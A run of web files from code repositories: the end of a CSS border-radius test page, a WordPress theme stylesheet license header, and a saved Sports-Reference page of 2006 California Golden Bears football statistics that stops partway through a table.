border-width: 3px 20px 9px 15px;</div> <div>border-radius: 10px; border: ridge; border-color: red green blue orange; border-width: 3px 20px 9px 15px;</div> <div>border-radius: 10px; border: inset; border-color: red green blue orange; border-width: 3px 20px 9px 15px;</div> <div>border-radius: 10px; border: outset; border-color: red green blue orange; border-width: 3px 20px 9px 15px;</div> <h2>Differing border colors, styles, and widths</h2> <div>border-radius: 10px; border-style: solid dotted dashed double; border-color: red green blue orange; border-width: 3px 20px 9px 15px;</div> <div>border-radius: 10px; border-style: groove ridge inset outset; border-color: red green blue orange; border-width: 3px 20px 9px 15px;</div> <h2>Arrow-ish</h2> <div>width: 0; height: 0; padding: 0; background: none; border-radius: 5px; border: 20px solid transparent; border-top-color: blue;</div> <div>width: 0; height: 0; padding: 0; background: none; border-radius: 5px; border: 20px solid transparent; border-right-color: blue;</div> <div>width: 0; height: 0; padding: 0; background: none; border-radius: 5px; border: 20px solid transparent; border-bottom-color: blue;</div> <div>width: 0; height: 0; padding: 0; background: none; border-radius: 5px; border: 20px solid transparent; border-left-color: blue;</div> </div> <script type="text/javascript"> (function() { var divs= document.getElementById("tests").getElementsByTagName("div"), i = 0, len = divs.length, css; for(; i < len; i++) { divs[i].style.cssText += divs[i].firstChild.nodeValue; } })(); </script> </body> </html>
wp-content/themes/chooko-lite/style.css
jessey90/nhamaytuongvy
/* Theme Name: Chooko Lite Theme URI: http://demo.iceable.com/chooko-lite/ Description: A sweet, colorful and responsive WordPress Theme. Author: Iceable Media Author URI: http://www.iceable.com License: GNU General Public License v3 (GPLv3) License URI: http://www.gnu.org/licenses/gpl-3.0.html Version: 1.0.1 Tags: brown, pink, tan, light, one-column, two-columns, three-columns, four-columns, left-sidebar, right-sidebar, fixed-width, custom-menu, featured-images, full-width-template, sticky-post, theme-options, threaded-comments, translation-ready Chooko Lite WordPress Theme by Iceable Themes Upgrade to Chooko Pro now on http://www.iceablethemes.com ! */ /* Copyright © 2013 Iceable Media This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. */
source_data/2006/stats/California.html
vrivellino/cfs
<!DOCTYPE html> <html itemscope itemtype="http://schema.org/website" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/" lang="en"> <head> <title>2006 California Golden Bears Statistics | College Football at Sports-Reference.com</title> <script type="text/javascript">var sr_gzipEnabled = false;</script> <script type="text/javascript" src="http://d2ft4b0ve1aur1.cloudfront.net/js-237/sr.gzipcheck.js.jgz"></script> <noscript> <link type="text/css" rel="stylesheet" href="http://d2ft4b0ve1aur1.cloudfront.net/css-237/sr-cfb-min.css"> </noscript> <script type="text/javascript"> (function () { var sr_css_file = 'http://d2ft4b0ve1aur1.cloudfront.net/css-237/sr-cfb-min.css'; if (sr_gzipEnabled) { sr_css_file = 'http://d2ft4b0ve1aur1.cloudfront.net/css-237/sr-cfb-min-gz.css'; } var head = document.getElementsByTagName("head")[0]; if (head) { var scriptStyles = document.createElement("link"); scriptStyles.rel = "stylesheet"; scriptStyles.type = "text/css"; scriptStyles.href = sr_css_file; head.appendChild(scriptStyles); //alert('adding css to header:'+sr_css_file); } }()); </script> <meta charset="utf-8"> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta name="keywords" content="college, ncaa, football, stats, statistics, history, California Golden Bears, 2006, stats"> <meta property="fb:admins" content="34208645" /> <meta property="fb:page_id" content="185855008121268" /> <meta property="og:site_name" content="College Football at Sports-Football-Reference.com"> <meta property="og:image" content="http://d2ft4b0ve1aur1.cloudfront.net/images-237/SR-College-Football.png"> <meta itemprop="image" content="http://d2ft4b0ve1aur1.cloudfront.net/images-237/SR-College-Football.png"> <meta property="og:description" content="Statistics, Game Logs, Splits, and much more"> <meta property="og:title" content="2006 California Golden Bears"> <meta property="og:url" content="http://www.sports-reference.com/cfb/schools/california/2006.html"> <meta property="og:type" content="team"> <link rel="canonical" href="http://www.sports-reference.com/cfb/schools/california/2006.html"/> <meta itemprop="name" content="2006 California Golden Bears"> <meta itemprop="description" content="Statistics, Game Logs, Splits, and much more"> <div></div><!-- to prevent hangs on some browsers --> <link rel="icon" type="image/vnd.microsoft.icon" href="http://d2ft4b0ve1aur1.cloudfront.net/images-237/favicon-cfb.ico"> <link rel="shortcut icon" type="image/vnd.microsoft.icon" href="http://d2ft4b0ve1aur1.cloudfront.net/images-237/favicon-cfb.ico"> <link rel="search" type="application/opensearchdescription+xml" href="http://d2ft4b0ve1aur1.cloudfront.net/os-237/opensearch-cfb.xml" title="CFB-Ref Search"> <!--[if lte IE 6]> <style type="text/css"> .hovermenu,.hovermenu_ajax,.sub_index,#quick_index {display:none!important} </style> <![endif]--> </head> <body> <div id="page_container"> <div id="top_nav"> <div id="site_header"> <div id="sr_header"> <div class="float_right"> <a href="http://www.sports-reference.com">S-R</a>: <a href="http://www.baseball-reference.com">MLB</a> | <a href="http://www.basketball-reference.com/">NBA</a> &#183; <a href="http://www.sports-reference.com/cbb/">CBB</a> | <a href="http://www.pro-football-reference.com">NFL</a> &#183; <span class="bold_text">CFB</span> | <a href="http://www.hockey-reference.com">NHL</a> | <a href="http://www.sports-reference.com/olympics/">Oly</a> | <a href="http://www.sports-reference.com/blog/">Blog</a> </div> <div class="clear_both clearfix float_right margin_left padding_top_half"> <a class="sprite-twitter" title="Follow us on Twitter" href="http://twitter.com/sports_ref"></a>&nbsp;<a class="sprite-facebook" title="Become a Fan on Facebook" href="http://www.facebook.com/SR.CollegeFootball"></a> </div> <div class="float_right"> <form method="get" id="f" name="f" action="/cfb/search.cgi"> <input x-webkit-speech type="search" placeholder="" id="search" name="search" class="search long"> <input type="submit" value="Search" class="submit"> </form> </div> </div> <div class="float_left padding_bottom_half"> <a href="/cfb/"><img src="http://d2ft4b0ve1aur1.cloudfront.net/images-237/SR-College-Football.png" width="464" height="49" class="border0" alt="College Football Statistics & History | College Football at Sports-Reference.com"></a> </div> </div> <div id="quick_index_container"> <div id="quick_index"> <ul class="hovermenu_ajax navbar"> <li class=""><a href="/cfb/play-index/">play index</a><ul class="li_margin" id="header_playindex"></ul></li> <li class=""><a href="/cfb/boxscores/">box scores</a><ul class="li_margin" id="header_boxscores"></ul></li> <li class=""><a href="/cfb/players/">players</a><ul class="li_margin" id="header_players"></ul></li> <li class="active"><a href="/cfb/schools/">schools</a><ul class="li_margin" id="header_schools"></ul></li> <li class=""><a href="/cfb/years/">seasons</a><ul class="li_margin" id="header_years"></ul></li> <li class=""><a href="/cfb/conferences/">conferences</a><ul class="li_margin" id="header_conferences"></ul></li> <li class=""><a href="/cfb/coaches/">coaches</a><ul class="li_margin" id="header_coaches"></ul></li> <li class=""><a href="/cfb/leaders/">leaders</a><ul class="li_margin" id="header_leaders"></ul></li> <li class=""><a href="/cfb/awards/">awards</a><ul class="li_margin" id="header_awards"></ul></li> <li class=""><a href="/cfb/bowls/">bowls</a><ul class="li_margin" id="header_bowls"></ul></li> <li class=""><a href="">more [+]</a> <ul class="li_margin" id="header_more_links"> <li> <a class="bold_text" href="/cfb/about/">About</a>: <a href="/cfb/about/what-is-major.html">What is Major?</a>, <a href="/cfb/about/glossary.html#srs">Simple Rating System</a>, <a href="/cfb/about/glossary.html">Glossary</a>, <a href="/cfb/about/sources.html">Sources</a>, <a href="/cfb/about/contact.html">Contacts</a>, <a href="/cfb/about/philosophy.html">Philosophy</a> </li> <li><a class="bold_text" href="http://www.sports-reference.com/blog/category/cfb-at-sports-reference/">Blog</a>: News and notes about CFB at Sports-Reference.com</li> <li> <a class="bold_text" href="/cfb/friv/">Frivolities</a>: <a href="/cfb/friv/elo.cgi">Elo School Rater</a> </li> </ul> </li> </ul> </div> </div> <div id="you_are_here"> <p><strong>You Are Here</strong>&nbsp;&gt;&nbsp;<a href="/cfb/">SR/CFB</a>&nbsp;&gt;&nbsp;<a href="/cfb/schools/">Schools</a>&nbsp;&gt;&nbsp;<a href="/cfb/schools/california/">California Golden Bears</a>&nbsp;&gt;&nbsp;<strong>2006</strong></p> </div> <style> .site_news { color:#fff!important; background-color:#747678; border-top:1px solid #000; border-bottom: 1px solid #000; clear:both; font-size:.875em; width:100%; } .site_news p { margin:0; padding:.35em .7em; } .site_news a { color:#fff; } </style> <div class="site_news"><p><span class="bold_text">News:</span> <span class="poptip" tip="Sports-Reference.com Widgets - Our Stats, Your Site We've just launched the first stage of our new Sports Reference Widget tool. By clicking the \"Embed\" tooltip just above any stats table on the site you can now get the code to add our daily updated stats to your site. See the widgets page for a description [...]">s-r blog:<a onClick="try { pageTracker._trackEvent('blog','click','area-yah'); } catch (err) {};" href="http://www.sports-reference.com/blog/2012/02/sports-reference-com-widgets-our-stats-your-site/">Sports-Reference.com Widgets &#8211; Our Stats, Your Site</a> <span class="small_text"></span></span></p></div> </div> <div id="info_box"> <div class="advert300x250"> <script type="text/deferscript"> var _ad_d = Math.floor(Math.random()*9999999999+1); document.write('<scr' + 'ipt src=http://ad.doubleclick.net/adj/collegefootballreference.fsv/ros;sect=ros;fantasy=no;game=no;tile=3;sz=300x250;ord=' + _ad_d + '?></scr' + 'ipt>'); </script> <noscript> <a href="http://ad.doubleclick.net/jump/collegefootballreference.fsv/ros;sect=ros;fantasy=no;game=no;tile=3;sz=300x250;ord=?" ><img alt="" SRC="http://ad.doubleclick.net/ad/collegefootballreference.fsv/ros;sect=ros;fantasy=no;game=no;tile=3;sz=300x250;ord=?" border="0" width="300" height="250" ></a> </noscript> </div> <h1>2006 California Golden Bears Statistics</h1> <div class="social_media"> <div class="float_left"><span id="fb-root"></span><fb:like width="200" show_faces="0" height="35" ref="team_like"></fb:like></div> <div class="float_left"><div class="g-plusone" data-size="medium" data-annotation="inline" data-width="150"></div></div> </div> <p><a href="/cfb/schools/california/">School Index:</a>&nbsp;<a href="/cfb/schools/california/2005.html">Previous Year</a>&nbsp;&#9642;&nbsp;<a href="/cfb/schools/california/2007.html">Next Year</a></p> <form class="sr_standard inline" name="pages" action=""> <strong>Navigation:</strong> <select name="cfb_pages" onchange="sr_goto_page('cfb_pages','',this.form);"> <option value="" disabled >Select Page <option value="/cfb/schools/california/2006.html" selected>Statistics <option value="/cfb/schools/california/2006-schedule.html">Schedule and Results <option value="/cfb/schools/california/2006-roster.html">Roster <option value="/cfb/schools/california/2006/gamelog/">Game Log <option value="/cfb/schools/california/2006/splits/">Splits </select> </form> <p class="margin_top"><strong>Conference:</strong> <a href="/cfb/conferences/pac-10/2006.html">Pac-10</a> <br><strong>Record:</strong> 10-3, .769 W-L% (17th of 119) (<a href="/cfb/schools/california/2006-schedule.html">Schedule and Results</a>) <br><strong>Coach:</strong> <a href="/cfb/coaches/jeff-tedford-1.html">Jeff Tedford</a> (10-3) <p><strong>PTS/G:</strong> 32.8 (11th of 119)&nbsp;&#9642;&nbsp;<strong>Opp PTS/G:</strong> 19.3 (32nd of 119) <br><strong><a href="/cfb/about/glossary.html#srs" onmouseover="Tip('Simple Rating System; a rating that takes into account average point differential and strength of schedule. The rating is denominated in points above/below average, where zero is average.')">SRS</a>:</strong> 16.36 (8th of 119)&nbsp;&#9642;&nbsp;<strong><a href="/cfb/about/glossary.html#sos" onmouseover="Tip('Strength of Schedule; a rating of strength of schedule. The rating is denominated in points above/below average, where zero is average.')">SOS</a>:</strong> 5.68 (16th of 119) <p><strong>Bowl Game:</strong> Won <a href="/cfb/bowls/holiday-bowl.html">Holiday Bowl</a> 45-10 versus <a href="/cfb/schools/texas-am/2006.html">Texas A&amp;M</a></div> <div class="advert728x90"> <script type="text/deferscript"> var _ad_c = Math.floor(Math.random()*9999999999+1); document.write('<scr' + 'ipt src=http://ad.doubleclick.net/adj/collegefootballreference.fsv/ros;sect=ros;fantasy=no;game=no;tile=1;dcopt=ist;sz=728x90;ord=' + _ad_c + '?></scr' + 'ipt>'); </script> <noscript> <a href="http://ad.doubleclick.net/jump/collegefootballreference.fsv/ros;sect=ros;fantasy=no;game=no;tile=1;sz=728x90;ord='+_ad_c+'?" ><img src="http://ad.doubleclick.net/ad/collegefootballreference.fsv/ros;sect=ros;fantasy=no;game=no;tile=1;sz=728x90;ord='+_ad_c+'?" border="0" height="90" width="728"></a> </noscript> </div><div class="clear_both margin0 padding0"></div> <div id="page_content"> <div class="table_heading"> <h2 style="">Team Statistics</h2> <div class="table_heading_text">Most values are per game averages</div> </div> <div class="table_container" id="div_team"> <table class=" show_controls stats_table" id="team"> <colgroup><col><col><col><col><col><col><col><col><col><col><col><col><col><col><col><col><col><col><col><col><col><col><col></colgroup> <thead> <tr class=" over_header"> <th></th> <th></th> <th align="center" colspan=5 class="bold_text over_header" >Passing</th> <th align="center" colspan=4 class="bold_text over_header" >Rushing</th> <th align="center" colspan=3 class="bold_text over_header" >Total Offense</th> <th align="center" colspan=4 class="bold_text over_header" >First Downs</th> <th align="center" colspan=2 class="bold_text over_header" >Penalties</th> <th align="center" colspan=3 class="bold_text over_header" >Turnovers</th> </tr> <tr class=""> <th align="left" class=" sort_default_asc" >Split</th> <th align="right" class="" tip="Games">G</th> <th align="right" class="" tip="Pass Completions">Cmp</th> <th align="right" class="" tip="Pass Attempts">Att</th> <th align="right" class="" tip="Pass Completion Percentage">Pct</th> <th align="right" class="" tip="Passing Yards">Yds</th> <th align="right" class="" tip="Passing Touchdowns">TD</th> <th align="right" class="" tip="Rush Attempts">Att</th> <th align="right" class="" tip="Rushing Yards">Yds</th> <th align="right" class="" tip="Rushing Yards Per Attempt">Avg</th> <th align="right" class="" tip="Rushing Touchdowns">TD</th> <th align="right" class="" tip="Plays (Pass Attempts plus Rush Attempts)">Plays</th> <th align="right" class="" tip="Total Yards (Passing Yards plus Rushing Yards)">Yds</th> <th align="right" class="" tip="Total Yards Per Play">Avg</th> <th align="right" class="" tip="First Downs by Pass">Pass</th> <th align="right" class="" tip="First Downs by Rush">Rush</th> <th align="right" class="" tip="First Downs by Penalty">Pen</th> <th align="right" class="" tip="First Downs">Tot</th> <th align="right" class="" tip="Penalties">No.</th> <th align="right" class="" tip="Penalty Yards">Yds</th> <th align="right" class="" tip="Fumbles Lost">Fum</th> <th align="right" class="" tip="Passing Interceptions">Int</th> <th align="right" class="" tip="Turnovers">Tot</th> </tr> </thead> <tbody> <tr class=""> <td align="left" >Offense</td> <td align="right" >13</td> <td align="right" >18.8</td> <td align="right" >31.8</td> <td align="right" >59.3</td> <td align="right" >253.2</td> <td align="right" >1.9</td> <td align="right" >32.8</td> <td align="right" >162.8</td> <td align="right" >5.0</td> <td align="right" >1.6</td> <td align="right" >64.6</td> <td align="right" >416.0</td> <td align="right" >6.4</td> <td align="right" >11.0</td> <td align="right" >8.2</td> <td align="right" >1.1</td> <td align="right" >20.2</td> <td align="right" >5.5</td> <td align="right" >47.7</td> <td align="right" >0.6</td> <td align="right" >1.1</td> <td align="right" >1.7</td> </tr> <tr class=""> <td align="left" >Defense</td> <td align="right" >13</td> <td align="right" >18.2</td> <td align="right" >32.4</td> <td align="right" >56.3</td> <td align="right" >240.8</td> <td align="right" >1.3</td> <td align="right" >33.1</td> <td align="right" >125.4</td> <td align="right" >3.8</td> <td align="right" >0.8</td> <td align="right" >65.5</td> <td align="right" >366.2</td> <td align="right" >5.6</td> <td align="right" >10.5</td> <td align="right" >6.8</td> <td align="right" >1.1</td> <td align="right" >18.3</td> <td align="right" >6.4</td> <td align="right" >49.3</td> <td align="right" >0.5</td> <td align="right" >1.6</td> <td align="right" >2.2</td> </tr> <tr class=""> <td align="left" >Difference</td> <td align="right" ></td> <td align="right" >+0.6</td> <td align="right" >-0.6</td> <td align="right" >+3.0</td> <td align="right" >+12.4</td> <td align="right" >+0.6</td> <td align="right" >-0.3</td> <td align="right" >+37.4</td> <td align="right" >+1.2</td> <td align="right" >+0.8</td> <td align="right" >-0.9</td> <td align="right" >+49.8</td> <td align="right" >+0.8</td> <td align="right" >+0.5</td> <td align="right" >+1.4</td> <td align="right" >0.0</td> <td align="right" >+1.9</td> <td align="right" >-0.9</td> <td align="right" >-1.6</td> <td align="right" >+0.1</td> <td align="right" >-0.5</td> <td align="right" >-0.5</td> </tr> </tbody> </table> </div> <div class="table_heading"> <h2 style="">Passing</h2> <div class="table_heading_text"></div> </div> <div class="table_container" id="div_passing"> <table class="sortable stats_table" id="passing"> <colgroup><col><col><col><col><col><col><col><col><col><col><col></colgroup> <thead> <tr class=" over_header"> <th align="CENTER" colspan=2 class="tooltip over_header" ></th> <th align="center" colspan=9 class="bold_text over_header" >Passing</th> </tr> <tr class=""> <th align="right" class="ranker sort_default_asc" tip="Rank">Rk</th> <th align="left" class="tooltip sort_default_asc" >Player</th> <th align="right" class="tooltip" tip="Pass Completions">Cmp</th> <th align="right" class="tooltip" tip="Pass Attempts">Att</th> <th align="right" class="tooltip" tip="Pass Completion Percentage">Pct</th> <th align="right" class="tooltip" tip="Passing Yards">Yds</th> <th align="right" class="tooltip" tip="Passing Yards Per Attempt">Y/A</th> <th align="right" class="tooltip" tip="Adjusted Passing Yards Per Attempt; the formula is (Yds + 20 * TD - 45 * Int) / Att">AY/A</th> <th align="right" class="tooltip" tip="Passing Touchdowns">TD</th> <th align="right" class="tooltip" tip="Passing Interceptions">Int</th> <th align="right" class="tooltip" tip="Passing Efficiency Rating; the formula is (8.4 * Yds + 330 * TD - 200 * Int + 100 * Cmp) / Att">Rate</th> </tr> </thead> <tbody> <tr class=""> <td align="right" csk="1">1</td> <td align="left" csk="Longshore,Nate"><a href="/cfb/players/nate-longshore-1.html">Nate Longshore</a></td> <td align="right" >227</td> <td align="right" >377</td> <td align="right" >60.2</td> <td align="right" >3021</td> <td align="right" >8.0</td> <td align="right" >7.7</td> <td align="right" >24</td> <td align="right" >13</td> <td align="right" >141.6</td> </tr> <tr class=""> <td align="right" csk="2">2</td> <td align="left" csk="Ayoob,Joe"><a href="/cfb/players/joe-ayoob-1.html">Joe Ayoob</a></td> <td align="right" >11</td> <td align="right" >26</td> <td align="right" >42.3</td> <td align="right" >205</td> <td align="right" >7.9</td> <td align="right" >6.9</td> <td align="right" >1</td> <td align="right" >1</td> <td align="right" >113.5</td> </tr> <tr class=""> <td align="right" csk="3">3</td> <td align="left" csk="Levy,Steve"><a href="/cfb/players/steve-levy-1.html">Steve Levy</a></td> <td align="right" >7</td> <td align="right" >10</td> <td align="right" >70.0</td> <td align="right" >66</td> <td align="right" >6.6</td> <td align="right" >6.6</td> <td align="right" >0</td> <td align="right" >0</td> <td align="right" >125.4</td> </tr> </tbody> </table> </div> <div class="table_heading"> <h2 style="">Rushing &amp; Receiving</h2> <div class="table_heading_text"></div> </div> <div class="table_container" id="div_rushing_and_receiving"> <table class="sortable stats_table" id="rushing_and_receiving"> <colgroup><col><col><col><col><col><col><col><col><col><col><col><col><col><col></colgroup> <thead> <tr class=" over_header"> <th align="CENTER" colspan=2 class="tooltip over_header" ></th> <th align="center" colspan=4 class="bold_text over_header" >Rushing</th> <th align="center" colspan=4 class="bold_text over_header" >Receiving</th> <th align="center" colspan=4 class="bold_text over_header" >Scrimmage</th> </tr> <tr class=""> <th align="right" class="ranker sort_default_asc" tip="Rank">Rk</th> <th align="left" class="tooltip sort_default_asc" >Player</th> <th align="right" class="tooltip" tip="Rush Attempts">Att</th> <th align="right" class="tooltip" tip="Rushing Yards">Yds</th> <th align="right" class="tooltip" tip="Rushing Yards Per Attempt">Avg</th> <th align="right" class="tooltip" tip="Rushing Touchdowns">TD</th> <th align="right" class="tooltip" tip="Receptions">Rec</th> <th align="right" class="tooltip" tip="Receiving Yards">Yds</th> <th align="right" class="tooltip" tip="Receiving Yards Per Reception">Avg</th> <th align="right" class="tooltip" tip="Receiving Touchdowns">TD</th> <th align="right" class="tooltip" tip="Plays From Scrimmage (Rush Attempts plus Receptions)">Plays</th> <th align="right" class="tooltip" tip="Yards From Scrimmage (Rushing Yards plus Receiving Yards)">Yds</th> <th align="right" class="tooltip" tip="Yards From Scrimmage Per Play">Avg</th> <th align="right" class="tooltip" tip="Touchdowns From Scrimmage (Rushing Touchdowns plus Receiving Touchdowns)">TD</th> </tr> </thead> <tbody> <tr class=""> <td align="right" csk="1">1</td> <td align="left" csk="Lynch,Marshawn"><a href="/cfb/players/marshawn-lynch-1.html">Marshawn Lynch</a></td> <td align="right" >223</td> <td align="right" >1356</td> <td align="right" >6.1</td> <td align="right" >11</td> <td align="right" >34</td> <td align="right" >328</td> <td align="right" >9.6</td> <td align="right" >4</td> <td align="right" >257</td> <td align="right" >1684</td> <td align="right" >6.6</td> <td align="right" >15</td> </tr> <tr class=""> <td align="right" csk="2">2</td> <td align="left" csk="Forsett,Justin"><a href="/cfb/players/justin-forsett-1.html">Justin Forsett</a></td> <td align="right" >119</td> <td align="right" >626</td> <td align="right" >5.3</td> <td align="right" >4</td> <td align="right" >12</td> <td align="right" >116</td> <td align="right" >9.7</td> <td align="right" >1</td> <td align="right" >131</td> <td align="right" >742</td> <td align="right" >5.7</td> <td align="right" >5</td> </tr> <tr class=""> <td align="right" csk="3">3</td> <td align="left" csk="Longshore,Nate"><a href="/cfb/players/nate-longshore-1.html">Nate Longshore</a></td> <td align="right" >28</td> <td align="right" >-47</td> <td align="right" >-1.7</td> <td align="right" >3</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" >28</td> <td align="right" >-47</td> <td align="right" >-1.7</td> <td align="right" >3</td> </tr> <tr class=""> <td align="right" csk="4">4</td> <td align="left" csk="O'Keith,Marcus"><a href="/cfb/players/marcus-okeith-1.html">Marcus O'Keith</a></td> <td align="right" >22</td> <td align="right" >104</td> <td align="right" >4.7</td> <td align="right" >1</td> <td align="right" >4</td> <td align="right" >55</td> <td align="right" >13.8</td> <td align="right" >0</td> <td align="right" >26</td> <td align="right" >159</td> <td align="right" >6.1</td> <td align="right" >1</td> </tr> <tr class=""> <td align="right" csk="5">5</td> <td align="left" csk="Storer,Byron"><a href="/cfb/players/byron-storer-1.html">Byron Storer</a></td> <td align="right" >8</td> <td align="right" >16</td> <td align="right" >2.0</td> <td align="right" >0</td> <td align="right" >8</td> <td align="right" >61</td> <td align="right" >7.6</td> <td align="right" >0</td> <td align="right" >16</td> <td align="right" >77</td> <td align="right" >4.8</td> <td align="right" >0</td> </tr> <tr class=""> <td align="right" csk="6">6</td> <td align="left" csk="Jackson,Desean"><a href="/cfb/players/desean-jackson-1.html">Desean Jackson</a></td> <td align="right" >5</td> <td align="right" >19</td> <td align="right" >3.8</td> <td align="right" >0</td> <td align="right" >59</td> <td align="right" >1060</td> <td align="right" >18.0</td> <td align="right" >9</td> <td align="right" >64</td> <td align="right" >1079</td> <td align="right" >16.9</td> <td align="right" >9</td> </tr> <tr class=""> <td align="right" csk="7">7</td> <td align="left" csk="Ayoob,Joe"><a href="/cfb/players/joe-ayoob-1.html">Joe Ayoob</a></td> <td align="right" >4</td> <td align="right" >0</td> <td align="right" >0.0</td> <td align="right" >1</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" >4</td> <td align="right" >0</td> <td align="right" >0.0</td> <td align="right" >1</td> </tr> <tr class=""> <td align="right" csk="8">8</td> <td align="left" csk="Hawkins,Lavelle"><a href="/cfb/players/lavelle-hawkins-1.html">Lavelle Hawkins</a></td> <td align="right" >3</td> <td align="right" >36</td> <td align="right" >12.0</td> <td align="right" >0</td> <td align="right" >46</td> <td align="right" >705</td> <td align="right" >15.3</td> <td align="right" >5</td> <td align="right" >49</td> <td align="right" >741</td> <td align="right" >15.1</td> <td align="right" >5</td> </tr> <tr class=""> <td align="right" csk="9">9</td> <td align="left" csk="Schutte,Bryan"><a href="/cfb/players/bryan-schutte-1.html">Bryan Schutte</a></td> <td align="right" >3</td> <td align="right" >19</td> <td align="right" >6.3</td> <td align="right" >1</td> <td align="right" >3</td> <td align="right" >48</td> <td align="right" >16.0</td> <td align="right" >0</td> <td align="right" >6</td> <td align="right" >67</td> <td align="right" >11.2</td> <td align="right" >1</td> </tr> <tr class=""> <td align="right" csk="10">10</td> <td align="left" csk="Jordan,Robert"><a href="/cfb/players/robert-jordan-1.html">Robert Jordan</a></td> <td align="right" >3</td> <td align="right" >-6</td> <td align="right" >-2.0</td> <td align="right" >0</td> <td align="right" >46</td> <td align="right" >571</td> <td align="right" >12.4</td> <td align="right" >4</td> <td align="right" >49</td> <td align="right" >565</td> <td align="right" >11.5</td> <td align="right" >4</td> </tr> <tr class=""> <td align="right" csk="11">11</td> <td align="left" csk="Levy,Steve"><a href="/cfb/players/steve-levy-1.html">Steve Levy</a></td> <td align="right" >2</td> <td align="right" >-5</td> <td align="right" >-2.5</td> <td align="right" >0</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" >2</td> <td align="right" >-5</td> <td align="right" >-2.5</td> <td align="right" >0</td> </tr> <tr class=""> <td align="right" csk="12">12</td> <td align="left" csk="Ta'Ufo'Ou,Will"><a href="/cfb/players/will-taufoou-1.html">Will Ta'Ufo'Ou</a></td> <td align="right" >1</td> <td align="right" >2</td> <td align="right" >2.0</td> <td align="right" >0</td> <td align="right" >2</td> <td align="right" >18</td> <td align="right" >9.0</td> <td align="right" >0</td> <td align="right" >3</td> <td align="right" >20</td> <td align="right" >6.7</td> <td align="right" >0</td> </tr> <tr class=""> <td align="right" csk="13">13</td> <td align="left" csk="Holley,Brian"><a href="/cfb/players/brian-holley-1.html">Brian Holley</a></td> <td align="right" >1</td> <td align="right" >2</td> <td align="right" >2.0</td> <td align="right" >0</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" >1</td> <td align="right" >2</td> <td align="right" >2.0</td> <td align="right" >0</td> </tr> <tr class=""> <td align="right" csk="14">14</td> <td align="left" csk="Hampton,Brandon"><a href="/cfb/players/brandon-hampton-1.html">Brandon Hampton</a></td> <td align="right" >1</td> <td align="right" >0</td> <td align="right" >0.0</td> <td align="right" >0</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" >1</td> <td align="right" >0</td> <td align="right" >0.0</td> <td align="right" >0</td> </tr> <tr class=""> <td align="right" csk="15">15</td> <td align="left" csk="Stevens,Craig"><a href="/cfb/players/craig-stevens-1.html">Craig Stevens</a></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" >17</td> <td align="right" >239</td> <td align="right" >14.1</td> <td align="right" >1</td> <td align="right" >17</td> <td align="right" >239</td> <td align="right" >14.1</td> <td align="right" >1</td> </tr> <tr class=""> <td align="right" csk="16">16</td> <td align="left" csk="Beegun,Eric"><a href="/cfb/players/eric-beegun-1.html">Eric Beegun</a></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" >7</td> <td align="right" >60</td> <td align="right" >8.6</td> <td align="right" >0</td> <td align="right" >7</td> <td align="right" >60</td> <td align="right" >8.6</td> <td align="right" >0</td> </tr> <tr class=""> <td align="right" csk="17">17</td> <td align="left" csk="Desa,Sam"><a href="/cfb/players/sam-desa-1.html">Sam Desa</a></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" >2</td> <td align="right" >9</td> <td align="right" >4.5</td> <td align="right" >0</td> <td align="right" >2</td> <td align="right" >9</td> <td align="right" >4.5</td> <td align="right" >0</td> </tr> <tr class=""> <td align="right" csk="18">18</td> <td align="left" csk="Young,Eddie"><a href="/cfb/players/eddie-young-1.html">Eddie Young</a></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" >2</td> <td align="right" >8</td> <td align="right" >4.0</td> <td align="right" >0</td> <td align="right" >2</td> <td align="right" >8</td> <td align="right" >4.0</td> <td align="right" >0</td> </tr> <tr class=""> <td align="right" csk="19">19</td> <td align="left" csk="Cunningham,Lareylle"><a href="/cfb/players/lareylle-cunningham-1.html">Lareylle Cunningham</a></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" >1</td> <td align="right" >10</td> <td align="right" >10.0</td> <td align="right" >0</td> <td align="right" >1</td> <td align="right" >10</td> <td align="right" >10.0</td> <td align="right" >0</td> </tr> <tr class=""> <td align="right" csk="20">20</td> <td align="left" csk="Morrah,Cameron"><a href="/cfb/players/cameron-morrah-1.html">Cameron Morrah</a></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" >1</td> <td align="right" >3</td> <td align="right" >3.0</td> <td align="right" >1</td> <td align="right" >1</td> <td align="right" >3</td> <td align="right" >3.0</td> <td align="right" >1</td> </tr> <tr class=""> <td align="right" csk="21">21</td> <td align="left" csk="Smith,Noah"><a href="/cfb/players/noah-smith-1.html">Noah Smith</a></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" >1</td> <td align="right" >1</td> <td align="right" >1.0</td> <td align="right" >0</td> <td align="right" >1</td> <td align="right" >1</td> <td align="right" >1.0</td> <td align="right" >0</td> </tr> </tbody> </table> </div> <div class="table_heading"> <h2 style="">Defense &amp; Fumbles</h2> <div class="table_heading_text"></div> </div> <div class="table_container" id="div_defense_and_fumbles"> <table class="sortable stats_table" id="defense_and_fumbles"> <colgroup><col><col><col><col><col><col><col><col><col><col><col><col><col><col><col><col></colgroup> <thead> <tr class=" over_header"> <th align="CENTER" colspan=2 class="tooltip over_header" ></th> <th align="center" colspan=5 class="bold_text over_header" >Tackles</th> <th 